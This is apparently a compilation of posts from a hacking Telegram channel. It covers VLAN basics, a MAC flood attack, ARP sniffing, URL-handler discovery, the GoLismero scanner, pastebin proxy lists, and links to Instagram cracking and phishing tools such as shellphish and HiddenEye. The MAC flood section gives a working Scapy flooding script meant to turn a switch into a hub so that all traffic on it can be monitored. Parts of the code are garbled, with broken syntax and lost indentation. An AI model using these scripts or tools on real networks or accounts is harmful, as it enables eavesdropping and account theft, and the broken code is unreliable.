▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑cross-domain VLAN:

VLAN (Virtual Local Area Network) is a virtual network constructed based on the Ethernet interactive technology. It can divide the same physical network into multiple VLANs , or it can cross the physical network barriers and assign users in different subnets to the same VLAN.

🦑There are many ways to implement VLAN , based on the VLAN division of switching equipment , there are generally two:

1) Switch-based port division

2) Based on IEEE 802.1q protocol, extended Ethernet frame format

> The second layer based VLAN technology, there Trunking concept, Trunking is used to switch between different connections, to ensure that the established across a plurality of switches on the same VLAN members can communicate with each other.

> The ports used for interconnection between switches are called Trunk ports. In addition to 802.1q , Cisco has its own Trunk protocol called ISL .

@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑MAC flood Attack :

1) A PC keeps sending data frames to unknown destinations, and the source MAC address of each packet is different. When such a data packet is sent fast enough, it will quickly fill the switch's CAM table within the refresh time. full. CAM table is these fake MAC occupy address, real MA C address entry can not enter CAM table. Then any normal unicast data frame passing through the switch will be processed in the form of a broadcast frame. The switch is downgraded to Hub in this case .

2) After the switch is downgraded to hub , we can monitor the data of all hosts connected to the switch.

Of course, the response of specific interactive devices to the ARP flood is different, and field testing is required. Next we enter the programming link.

🦑 TO DO :

1) There are many ways to construct random MAC and IP addresses, because the standard format of the address is there and it is easy to assemble. What I want to introduce here is the RandMAC and RandIP methods in the scapy module . These two methods are used to randomly generate MAC addresses and IP addresses, and the methods receive template parameters to generate addresses for specific network segments.

For example, the following code:

 

from scapy.all import *

 

i=5

while(i):

    print RandMAC()

    print RandIP()

    i=i-1

2) After the random problem is solved, what kind of data packets can we consider below to achieve the goal? Looking back at the content mentioned above, as long as we have the specified source IP and MAC in the data packet , the switch will record it.

For example ARP packet:

Ether (src= RandMAC (),dst= "FF:FF:FF:FF:FF:FF" )/ARP(op= 2 , psrc= "0.0.0.0" , hwdst= "FF:FF:FF:FF: FF:FF" )/ Padding (load= "X" 18 ))

For example ICMP package:

Ether(src=RandMAC(":::::"),

dst=RandMAC(":::::")) / \

IP(src=RandIP("..."),

dst=RandIP("...")) / \

ICMP()

3) #!/usr/bin/python

import sys

from scapy.all import

import time



iface="eth0"

if len(sys.argv)>=2:

iface=sys.argv1

while(1):

packet= Ether(src=RandMAC(":::::"),

dst=RandMAC(":::::")) / \

IP(src=RandIP("..."),

dst=RandIP("...")) / \

ICMP()

time.sleep(0.5)

sendp(packet,iface=iface,loop=0)

Now the code implements MAC flood attack by continuously sending ICMP packets ❤️👍🏻

@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

#full guide with pictures

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑ARP SNIFF CODE- not git :

 

from scapy.all import sniff,ARP

from signal import signal,SIGINT

import sys

 

ip_mac = {}

 

def watchArp(pkt):

    if point [ARP] .op == 2:

        print pkt[ARP].hwsrc + " " + pkt[ARP].psrc

 

  # Device is new. Remember it.

    if ip_mac.get(pkt[ARP].psrc) == None:

        print "Found new device " + \

        pkt[ARP].hwsrc + " " + \

        pkt[ARP].psrc

        ip_mac[pkt[ARP].psrc] = pkt[ARP].hwsrc

 

  # Device is known but has a different IP

    elif ip_mac.get(pkt[ARP].psrc) and ip_mac[pkt[ARP].psrc] != pkt[ARP].hwsrc:

        print pkt[ARP].hwsrc + \

        " has got new ip " + \

        pkt[ARP].psrc + \

        " (old " + ip_mac[pkt[ARP].psrc] + ")"

 

        ip_mac[pkt[ARP].psrc] = pkt[ARP].hwsrc

 

sniff(prn=watchArp,filter="arp",iface="eth0",store=0);

@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Discover and Hack URL handlers :

URL handlers are the bits in the front of the URLs (e.g. http:, https:, ftp:, skype:). They add things a web page can do to you and your device. Surprising applications have a nasty habit to register these without asking

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) git clone git clone https://github.com/ouspg/urlhandlers.git

2) cd handlers/web

3) ./osx/handlers-list.py > handlers.json

4) python -m SimpleHTTPServer 8080

F E A T U R E S :

-Launcher for the OSX Launch Services
-OSX open CLI tool
-Online JavaScript based testing UI for the Browsers
-HTML file with direct invocation (e.g. iframe)
-HTML redirects

✅GIT TOPIC
@undercodeTesting
@UndercodeHacking
@Undercodesecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

From broken link to subfolder takeover on Bukalapak #requested

new fast proxies :

https://pastebin.com/hUpLAjf7

Full with pictures

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑INSTAGRAM HACKING TOOLS "

https://github.com/fuck3erboy/instahack

https://github.com/Pure-L0G1C/Instagram

https://github.com/04x/instagramCracker

https://github.com/DarkSecDevelopers/HiddenEye

https://github.com/suljot/shellphish

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

UNDERCODE START A HACKERS NEWS SITE

FOR MORE VISIT: https://www.UndercodeNews.com

To watch more videos, please subscribe to the channel

You can also follow UndercodeNews on other social media platforms:

Twitter https://twitter.com/UndercodeNews
Instagram https://www.instagram.com/UndercodeNews
Facebook https://www.facebook.com/UndercodeNews
Telegram @UndercodeNews

Under code channel provides a news service around the clock, related to hacking & programming & much more... to follow up on events as soon as they happen.

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑topic updated web hacking-GoLismero is an open source framework for security testing. It's currently geared towards web security, but it can easily be expanded to other kinds of scans.

F E A T U R E S :

-Real platform independence. Tested on Windows, Linux, *BSD and OS X.

-No native library dependencies. All of the framework has been written in pure Python.

-Good performance when compared with other frameworks written in Python and other scripting languages.
Very easy to use.

-Plugin development is extremely simple.

-The framework also collects and unifies the results of well known tools: sqlmap, xsser, openvas, dnsrecon, theharvester...

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

-Integration with standards: CWE, CVE and OWASP.

1) sudo bash

2) apt-get install python2.7 python2.7-dev python-pip python-docutils git perl nmap sslscan

3) cd /opt

4) git clone https://github.com/golismero/golismero.git

5) cd golismero

6) pip install -r requirements.txt

7) pip install -r requirements_unix.txt

8) ln -s ${PWD}/golismero.py /usr/bin/golismero

9) exit

🦑 If you have an API key for Shodan, or an OpenVAS server or SpiderFoot server you want to integrate with GoLismero, run the following commands:

1) mkdir ~/.golismero

2) touch ~/.golismero/user.conf

3) chmod 600 ~/.golismero/user.conf

4) nano ~/.golismero/user.conf

5) At the editor, add the following sections to the file, as appropriate:

[shodan:Configuration]
apikey = <INSERT YOUR SHODAN API KEY HERE>

[openvas]
host = <INSERT THE OPENVAS HOST HERE>
user = <INSERT THE OPENVAS USERNAME HERE>
*password = <INSERT THE OPENVAS PASSWORD HERE>

[spiderfoot]
url = <INSERT THE SPIDERFOOT URL HERE>

✅GIT TOPIC
@undercodeTesting
@UndercodeHacking
@Undercodesecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

fresh proxies- detailed list

https://pastebin.com/xJ5Rjrbf